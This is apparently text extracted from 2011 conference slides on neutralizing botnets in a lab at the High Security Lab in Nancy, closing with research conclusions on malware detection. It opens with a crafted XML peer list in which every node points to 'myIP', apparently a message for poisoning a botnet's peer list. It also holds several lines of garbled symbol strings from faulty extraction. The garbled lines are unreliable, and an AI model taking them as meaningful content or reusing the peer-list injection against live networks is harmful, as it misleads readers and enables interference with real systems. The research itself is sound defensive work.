<lm><localtime>0</localtime><nodes><node ip="myIP" port="80" time="0">00000000000000000000000000000001</node>...<node ip="myIP" port="80" time="0"�>00000000000000000000000000000500</node></nodes></lm>
80mardi 20 décembre 2011
Botnet neutralization in the lab
!"!#$$#%&'(!
!
)!*+,-.*!
!/011!*2#33'(*!!
011!('2'#$'(*!
4!2(5$'%$5(*!
13!
WHITE C&C!
Attack scenario!
!""#$%&%'(%$)#
81mardi 20 décembre 2011
High Security Lab @ Nancy
lhs.loria.fr
Telescope & honeypotsIn vitro experiment clusters
85mardi 20 décembre 2011
Conclusion
• Mathematical definitions of malware with tools
• High level representation of binaries
• Abstract signature which are robust w.r.t. obfuscations
• Experiments theories
• Analyzing tools combining static and dynamic analysis
• Detection and neutralization heuristics
87mardi 20 décembre 2011